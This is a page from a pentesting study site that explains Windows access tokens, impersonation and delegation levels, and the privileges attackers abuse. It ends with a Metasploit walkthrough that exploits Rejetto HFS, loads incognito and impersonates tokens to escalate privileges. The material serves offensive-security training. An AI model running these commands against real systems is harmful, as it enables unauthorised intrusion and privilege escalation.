Dark Arts
  • index
  • BUY ME A BOOK
  • 🪄Dark Magic
    • Pentesting
      • Industry Methodologies
    • Scopes of Testing
    • Reconnaissance
      • Passive
        • WHOIS
        • DNS
          • nslookup
          • dig
        • WAF
        • Subdomain
        • Google Dork
        • Misc. Techniques
        • Leaked Passwords
      • Active
        • Browser & Plugins
        • ping & traceroute
        • fping
        • telnet & netcat
        • DNS
          • Zone Transfer
          • DNS Amplification DDoS Attack Breakdown
        • Misc. Techniques
    • Vulnerability Assessment
    • Attack Types
  • 🕷️Aragoogs Nest
    • Web Application Overview & Security
      • Security Testing
      • Common Threats & Risks
    • Web Application Architecture
      • Technologies
    • HTTP/S
      • Message
      • Request
      • Response
        • Status Code
    • Crawling/Spidering
  • 🧪Potions
    • Web Browsers
    • Computer Networking
      • Network Protocol
      • Packets
      • OSI Layer
        • Layer 3: Network
        • Layer 4: Transport
      • DNS
        • Primary-Secondary
        • Local Name Resolution
        • Domain Hierarchy
        • FQDN
        • Lookups
        • DNS Resolution
        • DNS Records
        • Security: Attack-Defense (Default)
  • 🎆Spells
    • 📜Linux Scroll
    • 📜WebShell Scroll
    • git
      • Attacks + Vulnerabilities
  • 🖼️Flaws w/ Magical Frameworks
    • Windows
      • In a Nutshell
      • CVE-2019-0708: BlueKeep
      • CVE-2017-0144: EternalBlue: MS17-010
      • Attacking Services
        • MS IIS - WebDAV
        • SMB
        • HTTP File Server (HFS)
        • Apache Tomcat Web Server
        • RDP
        • WinRM
      • File System Vulnerabilities
      • Credential Dumping
        • Password Search in Windows Configuration Files
        • Mimikatz
        • Pass-the-Hash Attack
    • Linux
      • In a Nutshell
      • CVE-2014-6271: Shellshock
      • Attacking Services
        • FTP
        • SSH
        • SAMBA
        • SMTP
        • RSYNC
      • Dumping Hashes
  • 🌼Marauder's Boost
    • Privilege Escalation
    • Windows PrivEsc
      • Windows Kernel Exploit
      • Bypassing UAC
      • Access Token Impersonation
    • Linux PrivEsc
      • Linux Kernel Exploit
      • Misconfigured Cron Jobs
      • Exploiting SUID Binaries
      • shells
      • File Permissions
  • ☠️Death Eaters
    • Post Exploitation
      • Windows
      • Linux
  • 🪄OLLIVANDERS
    • nmap
      • Host Discovery
      • Port Scan
      • Service & OS
      • NSE
      • Firewall/IDS Evasion
      • Scan Optimization
      • Misc. Methods
    • ffuf
    • Hydra
    • Metasploit Framework
      • Architecture
      • Must to Know
      • msfvenom
      • Auxiliary Modules
      • Service Enumeration
      • Vulnerability Scanning
      • Imports
      • Automating
    • Vulnerability Scanners
    • Wireshark
  • 🚂Platform 9(3/4)
    • Auth-Auth
      • Authentication
        • Password-based Authentication
        • Basic Authentication
        • Multi-factor Authentication
        • Access Token
        • Token-based Authentication
          • JWT
          • OAuth 2.0
    • Secure Headers
      • Content-Security-Policy (CSP)
    • Cryptography
      • Caesar Cipher
  • ⛲Port Pensieve
    • Enumeration
      • SMB & NetBIOS
      • SNMP
    • Wordlists
  • 🔆DUELS
    • Pivoting
    • SMB Relay Attack
  • 🗺️Marauder's Map
    • Web Application Pentesting
    • API Pentesting
      • GraphQL
        • Primer
    • Mobile Application Pentesting
  • 🎧SIDE CHANNEL
    • Side Channel Analysis
    • Timing Side-Channel Attacks
      • Vulnerable Login
  • 🥃Sky
    • Cloud Basics
    • Cloud Management
      • Shared Responsibility Model
    • Using Cloud Resources
      • Monitoring & Alerts
      • Identity & Access Management
      • Scalability & Availability
      • Solution Design
    • Cloud Providers
    • Cloud Security & Regulatory Compliance
      • Resource Protection
      • ICCA: Cloud Security & Regulatory Compliance
    • ICCA Preparation
      • Knowledge Tests
      • Lab
  • 🔷Obsidian
    • Pentest Engagement
      • Scoping
    • Pentest Ethics
      • Rules of Engagement
    • Auditing Fundamentals
      • Process/Lifecycle
      • Pentest & Security Auditing
      • GRC
      • Standards, Frameworks & Guidelines
      • From Audit to Pentest
  • 📡THREAT INTEL
    • Threat Intelligence
    • Tool Dump
  • 📱Anything-Mobile-IoT
    • Firmware
    • Firmware Analysis
      • Example: CVE-2016-1555
    • Firmware Installation/Flashing
  • 🎉Mischeif
    • Social Engineering
    • Phishing
      • GoPhish
    • Pretexting
Powered by GitBook
On this page
  • Category
  • Windows Privileges
  • Incognito
  1. Marauder's Boost
  2. Windows PrivEsc

Access Token Impersonation

Windows Access Tokens are like special keys that allow users or programs to access system resources without needing to enter their credentials every time. When a user logs into a Windows system, the winlogon.exe process creates an access token that contains the user’s identity and permissions. This token is attached to the user’s processes, allowing those processes to run with the same permissions. If the user starts any new programs, those will inherit the token as well, granting them access to the system based on the user's privileges. These tokens are managed by the LSASS (Local Security Authority Subsystem Service) service, which ensures that everything runs securely with the correct permissions.

Category

Windows Access Tokens are categorized into different security levels, which determine the privileges associated with the token. The main categories are:

  1. Impersonate-level Tokens: These tokens are created during non-interactive logins, such as when system services or domain logins occur. They can only be used to impersonate a user on the local system, not on external systems.

  2. Delegate-level Tokens: These tokens are created during interactive logins, such as when a user logs in directly or remotely through protocols like RDP. Delegate-level tokens are more powerful, as they can be used to impersonate a user on both the local system and external systems, making them a higher security risk.

In short, impersonate-level tokens are limited to local use, while delegate-level tokens allow broader access across systems.

Windows Privileges

When attackers gain initial access to a system, they may try to impersonate access tokens to increase their privileges. However, their success depends on:

  1. The privileges of the compromised account.

  2. The availability of impersonation or delegation tokens.

To carry out a successful impersonation attack, the attacker needs specific privileges, including:

  • SeAssignPrimaryToken – Allows an attacker to impersonate another user's token.

  • SeCreateToken – Enables an attacker to create a fake token with administrative privileges.

  • SeImpersonatePrivilege – Lets an attacker run processes as another user, typically an administrator.

These privileges give attackers the ability to execute commands or access data as higher-privileged users, potentially leading to full system control.

Incognito 

nmap [IP]

msfconsole -q
search rejetto
use 0
show options
set RHOSTS [TARGET IP]
exploit

meterpreter> sysinfo
> pgrep explorer
> migrate [PROCESS ID]

# operation will fail

> getuid
> getprivs
> load incognito
> list_tokens -u
> impersonate_token "[TOKEN TO IMPERSONATE]"
# if access is denied - getsystem
# dir C:\Windows\System32\*.txt /s /b
> getuid
> getprivs
PreviousBypassing UACNextLinux PrivEsc

Last updated 11 days ago

🌼
LogoMetasploit Unleashed - Free Online Ethical Hacking Course | OffSecOffSec